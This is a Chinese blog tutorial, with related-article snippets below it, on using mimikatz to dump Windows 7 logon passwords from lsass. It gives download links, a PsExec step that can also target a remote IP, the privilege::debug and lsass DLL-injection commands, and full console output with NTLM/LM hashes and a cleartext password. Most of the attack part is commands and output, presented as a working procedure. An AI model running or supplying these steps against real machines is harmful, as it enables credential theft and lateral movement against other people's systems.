用mimikatz来获取win7的密码

最新推荐文章于 2025-06-18 13:06:33 发布
最新推荐文章于 2025-06-18 13:06:33 发布
阅读量8.2k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 工具 文章标签: mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/feier7501/article/details/8841568
本文介绍如何利用Mimikatz工具在Windows 7操作系统中获取用户登录密码,包括工具的下载链接及详细步骤说明。通过提升权限、注入DLL到lsass进程并抓取密码等操作实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

mimikatz下载地址:

http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip


blog.gentilkiwi.com应该是法国佬的博客。


用mimikatz来获取win7的密码:


Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator>cd C:\mimikatz_trunk\tools

C:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd C:\mimikatz_trunk\Win32

C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;395889
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;155584
Package d'authentification  : NTLM
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;75419
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;40847
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

mimikatz # exit
Fermeture du canal de communication

C:\mimikatz_trunk\Win32>


wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。


工具的作者的blog:http://blog.gentilkiwi.com/mimikatz


解释:

privilege::debug  //提升权限


inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"   //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!


@getLogonPasswords  //抓取密码


exit  //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环


另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:

PsExec.exe \\192.168.1.123 cmd.exe

把上面的192.168.1.123改为目标的IP。

mimikatz获取密码_如何查找win7电脑的计算机名和密码
weixin_39542477的博客
12-24 551
查找win7电脑的计算机名查看计算机密码就需要一个工具才能查看,密码都是黑点显示,除非用户自己知道,不然只能使用工具查看系统密码请点击输入图片描述这个工具可以在登录了系统桌面同时,关闭杀软清理软件的情况下 获取系统密码mimikatz简介:是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取window...
CS和msf的权限传递,利用mimikatz抓取win10明文密码
繁星
06-02 1574
安装CobaltStrike,浏览博主的上篇文章即可!!!这里我在自己的本机win11上执行了Client去连接kali中的Server端,直接执行.cmd文件即可!!!
win7(32,64)源码获得系统所有的用户密码
04-04
需要管理员权限运行,32位的已经编译,可直接运行便可得到系统密码,64位没有编译,我的编译工具是vc++6.0,有源码有真相。
深入探究MimikatzWindows系统密码抓取工具
最新发布
weixin_42348783的博客
06-18 1095
Mimikatz是一个广泛使用的安全工具,它能够提取Windows系统中敏感信息,如密码、哈希值和Kerberos票据等。它在安全测试和渗透测试中扮演着重要角色,但同时也可能被滥用导致安全风险。Kerberos是广泛使用的网络认证协议,它通过使用密钥分布中心(KDC)来实现安全的用户和服务之间的认证。Kerberos协议允许用户通过证明自己知道密码的散列(即密钥)来进行认证,而不是明文密码本身,从而提供了双向认证和会话密钥的分发。
获取win7登录密码的工具
11-25
获取win7登录密码的工具
利用mimikatz插件获取内网相关信息
Web安全工具库
07-12 500
你宁愿错过也不愿意主动是吗。。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.137 一、生成木马及监听主机参考上篇文章: 二、利用mimikatz获取内网相关信息 1、加载mimikatz meterpreter > load kiwi 2、查看帮助信息 meterpreter > helpkiwi 3、获取用户的hash值 m...
mimikatz_trunk-win7密码
02-26
总的来说,"mimikatz_trunk-win7密码" 提供了一个研究和学习Windows 7系统安全性的工具,特别是关于密码管理、权限提升和安全审计的方面。正确使用和理解Mimikatz能帮助提高系统防护能力,防止恶意攻击者利用这些...
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7673
一、思路 1.准备虚拟机环境windows7windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
利用mimikatz轻松获取Windows登录密码
为了使用mimikatz获取密码,首先需要在目标系统上以管理员权限运行mimikatz程序。在执行`privilege::debug`命令后,系统会提升权限,此时就可以执行后续操作。通过注入操作获取LSASS进程的权限后,执行`@...
Mimikatz工具破解Win7 64位系统密码实战教程
它在Win7 64位系统上使用尤为突出,这是因为它可以利用Windows的安全漏洞或配置不当,从内存中提取凭据。不过,随着Windows系统的更新,微软也在不断加强安全措施,以防止此类攻击的发生。 #### 8. mimikatz的安装...
mimikatz_trunk.zip
11-28
mimikataz密码抓取工具
神器mimikatz_trunk
01-24
32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行 法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008 WIN2000还未测试 个人感觉应该也可以 没打建环境测试 还有一篇用这个神器直接从 lsass.exe获取windows处于active状态账号明文密码的文章 自己尝试了下用 win2008 r2 x64 来测试 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !Message du processus :Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package d'authentification : NTLMUtilisateur principal : Gentil UserDomaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : passwordAuthentification Id : 0;269806Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Posted in Blog
内网渗透专用-mimikatz
05-06
懂得都懂!
mimikatz2 0 最新 一键版
05-04
mimikatz2 0 最新 一键版 源码编译 32位 64位
mimikatz-master.zip
07-06
获取windows账户密码,支持win10 1603; github找这个名字的资源即可,这个只是复制的,vs2010以上编译 获取windows账户密码,支持win10 1603; github找这个名字的资源即可,这个只是复制的,vs2010以上编译 获取windows账户密码,支持win10 1603; github找这个名字的资源即可,这个只是复制的,vs2010以上编译 获取windows账户密码,支持win10 1603; github找这个名字的资源即可,这个只是复制的,vs2010以上编译
mimikatz基础
rnn0921的博客
08-23 651
安装流程(mimikatzWindows上使用老出错,所以我在linux上连接本机使用的)使用详情:用msfvenom控制本机加载mimkatzload kiwi查看命令查看当前目录查看当前目录下的内容尝试下载666.png下载成功!
轻量级调试器神器 - mimikatz
Yatere的天平秤
03-08 2939
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
【免费下载】 mimikatz 2.2.0 资源文件下载
gitblog_09806的博客
10-21 424
mimikatz 2.2.0 资源文件下载 【下载地址】mimikatz2.2.0资源文件下载 本仓库提供了一个名为 `mimikatz_trunk.7z` 的资源文件下载。该文件包含了 mimikatz 2.2.0 版本的相关内容。mimikatz 是一个著名的开源工具,广泛用于安全测试和渗透测试领域,主要用于提取和操...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值